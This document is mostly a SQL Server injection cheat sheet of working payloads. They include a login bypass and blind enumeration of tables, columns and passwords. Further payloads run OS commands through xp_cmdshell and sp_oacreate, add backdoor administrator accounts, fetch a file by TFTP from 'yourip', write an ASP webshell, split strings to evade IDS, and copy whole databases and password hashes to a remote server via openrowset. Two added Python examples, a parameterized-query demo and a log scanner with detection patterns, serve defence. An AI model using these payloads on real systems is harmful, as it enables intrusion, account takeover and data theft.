A faulty statement:

    SQL = "select PWD, answer from [member] Where userid = '" & userid & "' and answer = '" & Answer & "'"

This low-level error is still made. At this point you only need to construct a special user name and password based on the SQL, such as:

    ' or '1'='1

1. Determine whether an injection point exists:

    and 1=1
    and 1=2

2. Guess the table name. Typical names are admin, adminuser, user, pass, password, ...

    and 0<>(select count(*) from *)
    and 0<>(select count(*) from admin)    -- determine whether the admin table exists

3. Count the accounts. If "0<" returns the correct page and "1<" returns the error page, the number of accounts is 1:

    and 0<(select count(*) from admin)
    and 1<(select count(*) from admin)

4. Guess the field names by putting the expected name inside len():

    and 1=(select count(*) from admin where len(*)>0)--
    and 1=(select count(*) from admin where len(<user field name>)>0)
    and 1=(select count(*) from admin where len(<password field name>)>0)

5. Guess the length of each field, changing the number until the correct page is returned:

    and 1=(select count(*) from admin where len(*)>0)
    and 1=(select count(*) from admin where len(name)>6)         -- error
    and 1=(select count(*) from admin where len(name)>5)         -- correct, so the length is 6
    and 1=(select count(*) from admin where len(name)=6)         -- correct
    and 1=(select count(*) from admin where len(password)>11)    -- correct
    and 1=(select count(*) from admin where len(password)>12)    -- error, so the length is 12
    and 1=(select count(*) from admin where len(password)=12)    -- correct

6. Guess the characters:

    and 1=(select count(*) from admin where left(name,1)='a')    -- first character of the user account
    and 1=(select count(*) from admin where left(name,2)='ab')   -- first two characters of the user account

Adding one character at a time, up to the length just guessed, recovers the whole account.

    and 1=(select top 1 count(*) from admin where asc(mid(pass,5,1))=51)--

This query can be used to guess Chinese user names and passwords: replace the number with the ASCII code and convert the result back into a character.

    group by users.id having 1=1--
    group by users.id, users.username, users.password, users.privs having 1=1--
    ;insert into users values(666,'attacker','foobar',0xffff)--
    union select top 1 column_name from information_schema.columns where table_name='logintable'--
    union select top 1 column_name from information_schema.columns where table_name='logintable' and column_name not in ('login_id')--
    union select top 1 column_name from information_schema.columns where table_name='logintable' and column_name not in ('login_id','login_name')--
    union select top 1 login_name from logintable--
    union select top 1 password from logintable where login_name='Rahul'--

Check the server patch level (an error means SP4 is applied):

    and 1=(select @@version)--

Check the permissions of the database connection account. A normal page proves the account holds the sysadmin server role:

    and 1=(select is_srvrolemember('sysadmin'))--

Determine the database connection account.
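The faulty login statement at the top of the page builds its query by string concatenation. The Python example below is added here and is not part of the original page: it reproduces that query against an in-memory SQLite table with constructed sample data, and shows the page's `' or '1'='1` input returning a row from the concatenated form while the parameterized form treats the same input as an ordinary string.

```python
"""Concatenated vs parameterized form of the page's login query (SQLite in memory)."""
import sqlite3

# Constructed sample data mirroring the page's [member] table: userid, pwd, answer.
SAMPLE_ROWS = [("alice", "s3cret", "blue")]


def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE member (userid TEXT, pwd TEXT, answer TEXT)")
    conn.executemany("INSERT INTO member VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, userid, answer):
    """String concatenation, as in the page's faulty statement: the input
    becomes part of the SQL text, so quotes in it change the WHERE clause."""
    sql = ("select pwd, answer from member where userid = '" + userid
           + "' and answer = '" + answer + "'")
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, userid, answer):
    """Placeholders: the driver binds the input as a value, so the same
    quote-laden string is compared literally and matches nothing."""
    sql = "select pwd, answer from member where userid = ? and answer = ?"
    return conn.execute(sql, (userid, answer)).fetchall()


def demo():
    """Run both forms with a legitimate login and with the page's bypass input."""
    conn = setup_db()
    bypass = "' or '1'='1"  # the page's example input
    return {
        "vuln_legit": lookup_vulnerable(conn, "alice", "blue"),
        "vuln_bypass": lookup_vulnerable(conn, bypass, bypass),
        "param_legit": lookup_parameterized(conn, "alice", "blue"),
        "param_bypass": lookup_parameterized(conn, bypass, bypass),
    }
```

With the bypass input the concatenated query becomes `... where userid = '' or '1'='1' and answer = '' or '1'='1'`, which is true for every row; the bound parameters never reach the parser.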
A normal page proves the connection account is sa:

    and 'sa'=(select system_user)--
    and user_name()='dbo'--
    and 0<>(select user_name())--

Check whether xp_cmdshell has been deleted:

    and 1=(select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell')--

If xp_cmdshell has been deleted, restore it (an absolute path is also supported):

    ;exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--
    ;exec master.dbo.sp_addextendedproc 'xp_cmdshell','c:\inetpub\wwwroot\xplog70.dll'--

Reverse ping your own host:

    ;use master;declare @s int;exec sp_oacreate 'wscript.shell',@s out;exec sp_oamethod @s,'run',null,'cmd.exe /c ping 192.168.0.1';--

Add an account:

    ;declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'--

Create a virtual directory for drive e:

    ;declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',null,'cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "Default Web Site" -v "e","e:\"'--

Access attributes (write a webshell together):

    declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',null,'cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/root/e +browse'

Tip: %5c = \ (when submitting, / and \ can be written as %5c).

    and 0<>(select top 1 paths from newtable)--

Obtain the database names (dbid 1 to 5 are the system databases; from 6 upward they can be determined):

    and 1=(select name from master.dbo.sysdatabases where dbid=7)--
    and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)

Submit further dbid values (9, ...) to get more database names.

    and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='u')   -- brute-force a table; assume it is admin
    and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='u' and name not in ('admin'))   -- obtain the other tables
    and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='u' and name='admin' and uid>(str(id)))   -- brute-force the uid; assume it is 18779569 (uid=id)
    and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569)   -- obtain an admin field; assume it is user_id
    and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in ('id',...))   -- expose the other fields
    and 0<(select user_id from bbs.dbo.admin where username>1)   -- get the username, then the password ...

Assuming the fields user_id, username, password and so on exist:

    and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
    and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='u')
    and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='u' and name not in ('address'))
    and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='u' and name='admin' and uid>(str(id)))   -- determine the id value
    and 0<>(select top 1 name from bbs.dbo.syscolumns where id=773577794)   -- all fields

    ?id=-1 union select 1,2,4,5,6,7,8,9,10,11,12,13,* from admin
    ?id=-1 union select 1,2,4,5,6,7,8,*,9,10,11,12,13 from admin

(union is also useful against Access.)

Obtain the web path:

    ;create table [dbo].[swap]([swappass] [char](255));--
    and (select top 1 swappass from swap)=1--
    ;create table newtable(id int identity(500),paths varchar()) declare @test varchar(20) exec master..xp_regread @rootkey='hkey_local_machine',@key='system\currentcontrolset\services\w3svc\parameters\virtual roots\',@value_name='/',values=@test output insert into paths(path) values(@test)--
    ;use ku1;--
    ;create table cmd(str image);--   -- create an image-type table cmd

Test whether xp_cmdshell exists:

    ;exec master..xp_cmdshell 'dir'

Add an SQL account:

    ;exec master.dbo.sp_addlogin jiaoniang$;--
    ;exec master.dbo.sp_password null,jiaoniang$,1866574;--
    ;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--
    ;exec master.dbo.xp_cmdshell 'net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
    ;exec master.dbo.xp_cmdshell 'net localgroup administrators jiaoniang$ /add';--
    exec master..xp_servicecontrol 'start','schedule'   -- start the service
    exec master..xp_servicecontrol 'start','server'
    ;declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'
    ;declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add'
    ;exec master..xp_cmdshell 'tftp -i yourip get file.exe'   -- use TFTP to upload files
    ;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
    ;declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
    ;declare @a;set @a=db_name();backup database @a to disk='\\<your ip>\<your share>\bak.dat'

If this is restricted, you can use:

    select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec master.dbo.sp_addlogin hax')

Query structure:

    select * from news where id=... and topic=... and ...

    admin' and 1=(select count(*) from [user] where username='victim' and right(left(userpass,01),1)='1') and userpass<>'
    select 123;--
    ;use master;--
    :a' or name like 'fff%';--   -- displays a user named ffff
    and 1<>(select count(email) from [user]);--
    ;update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) where name='ffff';--
    ;update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where name='ffff';--
    ;update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110) where name='ffff';--
    ;update [users] set email=(select top 1 count(id) from password) where name='ffff';--
    ;update [users] set email=(select top 1 pwd from password where id=2) where name='ffff';--
    ;update [users] set email=(select top 1 name from password where id=2) where name='ffff';--

The statements above fetch the first user table of the database and put its name into the mailbox field of user ffff. By viewing ffff's user information you obtain the first table, named ad. The id of that table is then obtained from the name ad, and from the id the name of the second table.

    insert into users values(666,char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),0xffff)--
    insert into users values(667,123,123,0xffff)--
    insert into users values(123,'admin --','password',0xffff)--
    ;and user>0
    ;and (select count(*) from sysobjects)>0
    ;and (select count(*) from mysysobjects)>0   -- Access database: name of the data table
    ;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0);--

The last statement writes the first table name into the aaa field. Read the first table; the second table is read the same way by adding "and name<>" followed by the table name just obtained to the condition.
    ;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0 and name<>'vote');--

then

    id=1552 and exists(select * from aaa where aaa>5)

reads the second table; continue one by one until nothing is returned. Fields are read as follows:

    ;update aaa set aaa=(select top 1 col_name(object_id('<table name>'),1));--

then

    id=152 and exists(select * from aaa where aaa>5)   -- the error reveals the field name
    ;update aaa set aaa=(select top 1 col_name(object_id('<table name>'),2));--
    id=152 and exists(select * from aaa where aaa>5)   -- the error reveals the field name

[Retrieve table names] (update a field to the table name, then read that field to get the table name):

    update <table> set <field>=(select top 1 name from sysobjects where xtype='u' and status>0 [and name<>'<table already obtained>']) [where condition]
    select top 1 name from sysobjects where xtype='u' and status>0 and name not in ('table1','table2',...)

Creating a database administrator account and a system administrator account through a SQL Server injection vulnerability [the current account must be in the sysadmin group].

[Obtain the field names of a table] (update a field to the field name, then read that field to get the field name):

    update <table> set <field>=(select top 1 col_name(object_id('<table to query>'),<column number, e.g. 1>)) [where condition]

Bypassing IDS detection [using variables]:

    ;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
    ;declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'

1. Enable the remote database. Basic syntax:

    select * from openrowset('sqloledb','server=servername;uid=sa;pwd=123','select * from table1')

   Parameters: (1) the OLE DB provider name;

2. the connection string, which can use any port for the connection, for example:

    select * from openrowset('sqloledb','uid=sa;pwd=123;network=dbmssocn;address=192.168.0.1,1433;','select * from table')

3. Copy the entire database: insert all remote tables of the target host into the local table. Basic syntax:

    insert into openrowset('sqloledb','server=servername;uid=sa;pwd=123','select * from table1') select * from table2

   This statement copies all data of table2 on the target host into table1 in the remote database. In actual use, change the IP address and port in the connection string to the desired location, for example:

    insert into openrowset('sqloledb','uid=sa;pwd=123;network=dbmssocn;address=192.168.0.1,1433;','select * from table1') select * from table2
    insert into openrowset('sqloledb','uid=sa;pwd=123;network=dbmssocn;address=192.168.0.1,1433;','select * from _sysdatabases') select * from master.dbo.sysdatabases
    insert into openrowset('sqloledb','uid=sa;pwd=123;network=dbmssocn;address=192.168.0.1,1433;','select * from _sysobjects') select * from user_database.dbo.sysobjects
    insert into openrowset('sqloledb','uid=sa;pwd=123;network=dbmssocn;address=192.168.0.1,1433;','select * from _syscolumns') select * from user_database.dbo.syscolumns

Copy the database:

    insert into openrowset('sqloledb','uid=sa;pwd=123;network=dbmssocn;address=192.168.0.1,1433;','select * from table1') select * from database..table1
    insert into openrowset('sqloledb','uid=sa;pwd=123;network=dbmssocn;address=192.168.0.1,1433;','select * from table2') select * from database..table2

Copy the hash table: the logon password hashes are stored in sysxlogins.
The method is as follows:

    insert into openrowset('sqloledb','uid=sa;pwd=123;network=dbmssocn;address=192.168.0.1,1433;','select * from _sysxlogins') select * from database.dbo.sysxlogins

After obtaining the hashes, you can brute-force them.

To traverse directories, create a temporary table temp:

    ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
    ;insert temp exec master.dbo.xp_availablemedia;--   -- get all current drives
    ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--   -- get the subdirectory list
    ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--   -- get the directory tree of all subdirectories and import it into temp
    ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--   -- view the content of a file
    ;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--
    ;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\*.asp /s';--
    ;insert into temp(id) exec master.dbo.xp_cmdshell 'cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc'
    ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--   -- (xp_dirtree permission: public)

Write to a table:

    Statement 1: and 1=(select is_srvrolemember('sysadmin'));--
    Statement 2: and 1=(select is_srvrolemember('serveradmin'));--
    Statement 3: and 1=(select is_srvrolemember('setupadmin'));--
    Statement 4: and 1=(select is_srvrolemember('securityadmin'));--
    Statement 5: and 1=(select is_srvrolemember('diskadmin'));--
    Statement 6: and 1=(select is_srvrolemember('bulkadmin'));--
    Statement 7: and 1=(select is_member('db_owner'));--

Write the paths to a table:

    ;create table dirs(paths varchar(100),id int)--
    ;insert dirs exec master.dbo.xp_dirtree 'c:\'--
    and 0<>(select top 1 paths from dirs)--
    and 0<>(select top 1 paths from dirs where paths not in ('@inetpub'))--
    ;create table dirs1(paths varchar(100),id int)--
    ;insert dirs1 exec master.dbo.xp_dirtree 'e:\web'--
    and 0<>(select top 1 paths from dirs1)--

Back up the database to the web directory and download it:

    ;declare @a sysname;set @a=db_name();backup database @a to disk='e:\web\down.bak';--

    and 1=(select top 1 name from (select top 12 id,name from sysobjects where xtype=char(85)) t order by id desc)
    and 1=(select top 1 col_name(object_id('user_login'),1) from sysobjects)   -- see the related tables
    and 1=(select user_id from user_login)
    and 0=(select user from user_login where user>1)

Wscript.Shell example:

    declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',null,'notepad.exe'
    ;declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',null,'notepad.exe'--

Read a file with Scripting.FileSystemObject:

    declare @o int,@f int,@t int,@ret int
    declare @line varchar(8000)
    exec sp_oacreate 'scripting.filesystemobject',@o out
    exec sp_oamethod @o,'opentextfile',@f out,'c:\boot.ini',1
    exec @ret=sp_oamethod @f,'readline',@line out
    while (@ret=0)
    begin
        print @line
        exec @ret=sp_oamethod @f,'readline',@line out
    end

Write a file:

    declare @o int,@f int,@t int,@ret int
    exec sp_oacreate 'scripting.filesystemobject',@o out
    exec sp_oamethod @o,'createtextfile',@f out,'c:\inetpub\wwwroot\foo.asp',1
    exec @ret=sp_oamethod @f,'writeline',null,'<% set o=server.createobject("wscript.shell"):o.run(request.querystring("cmd")) %>'

Speech.VoiceText example:

    declare @o int,@ret int
    exec sp_oacreate 'speech.voicetext',@o out
    exec sp_oamethod @o,'register',null,'foo','bar'
    exec sp_oasetproperty @o,'speed',150
    exec sp_oamethod @o,'speak',null,'all your sequel servers are belong to us',528
    waitfor delay '00:00:05'

(When injected, the same sequence starts with ; and ends with --.)

xp_dirtree permission: public

    exec master.dbo.xp_dirtree 'c:\'

The returned result has two fields, subdirectory and depth: subdirectory is a character field and depth is an integer field.

    create table dirs(paths varchar(100),id int)

This creates a table whose fields match those returned by xp_dirtree in number and type.

    insert dirs exec master.dbo.xp_dirtree 'c:\'

As long as the table definition matches the fields returned by the stored procedure, the insert executes and writes the result into the table, obtaining step by step the information we want.
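Most of the probes catalogued on this page leave recognisable traces in the web server's access log: the `and 1=1` / `and 1=2` pairs, `select count(*) from`, the `is_srvrolemember` role checks, reads of the catalog tables, stacked `exec` of extended procedures such as xp_cmdshell, and the split-string `'xp_'+'cmdshell'` trick used to bypass IDS matching. The scanner below is an added example, not part of the original page; its log lines are constructed in IIS W3C style with documentation addresses, and it undoes the string concatenation after URL-decoding so that the evasion variant is caught as well.

```python
"""Flag the SQL Server injection probes catalogued on this page in web access logs."""
import re
from urllib.parse import unquote_plus

# Constructed sample lines (IIS W3C style): date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2024-01-05 10:00:01 203.0.113.7 GET /news.asp id=5 200
2024-01-05 10:00:02 203.0.113.7 GET /news.asp id=5+and+1%3D1 200
2024-01-05 10:00:03 203.0.113.7 GET /news.asp id=5+and+1%3D2 500
2024-01-05 10:00:04 203.0.113.7 GET /news.asp id=5+and+1%3D(select+is_srvrolemember(%27sysadmin%27))-- 200
2024-01-05 10:00:05 203.0.113.7 GET /news.asp id=5;declare+@a+sysname+set+@a=%27xp_%27%2B%27cmdshell%27+exec+@a+%27dir+c:%5c%27-- 200
2024-01-05 10:00:06 198.51.100.9 GET /news.asp id=7 200
"""

# One pattern per technique family from the page, matched against the decoded, de-concatenated query.
SIGNATURES = {
    "boolean_probe": re.compile(r"\band\s+1\s*=\s*[12]\b", re.I),
    "count_probe": re.compile(r"select\s+(top\s+\d+\s+)?count\s*\(\s*\*\s*\)\s+from", re.I),
    "role_check": re.compile(r"is_(srvrolemember|member)\s*\(", re.I),
    "catalog_enum": re.compile(r"\b(sysobjects|syscolumns|sysdatabases|information_schema)\b", re.I),
    "stacked_exec": re.compile(r"\b(xp_cmdshell|sp_oacreate|sp_oamethod|xp_dirtree|xp_regread|openrowset|sp_addextendedproc|backup\s+database)\b", re.I),
}


def normalize(query: str) -> str:
    """URL-decode the query string, then undo the page's IDS-evasion trick of
    splitting a procedure name into concatenated literals ('xp_'+'cmdshell')."""
    decoded = unquote_plus(query)
    return re.sub(r"'\s*\+\s*'", "", decoded)


def scan_line(line: str):
    """Return (client_ip, uri_stem, [technique names]) for one log line, or None if clean."""
    parts = line.split()
    if len(parts) < 7:
        return None
    _date, _time, ip, _method, stem, query, _status = parts[:7]
    normalized = normalize(query)
    hits = [name for name, rx in SIGNATURES.items() if rx.search(normalized)]
    return (ip, stem, hits) if hits else None


def scan_log(text: str):
    """Scan every line and count hits per client IP, so a probing sequence stands out."""
    per_ip = {}
    for line in text.splitlines():
        result = scan_line(line)
        if result:
            ip, _stem, hits = result
            for name in hits:
                per_ip.setdefault(ip, {}).setdefault(name, 0)
                per_ip[ip][name] += 1
    return per_ip
```

The boolean probe pattern deliberately requires a literal 1 or 2 after the equals sign, so the `and 1=(select ...)` forms are counted under their own family rather than inflating the true/false probe count.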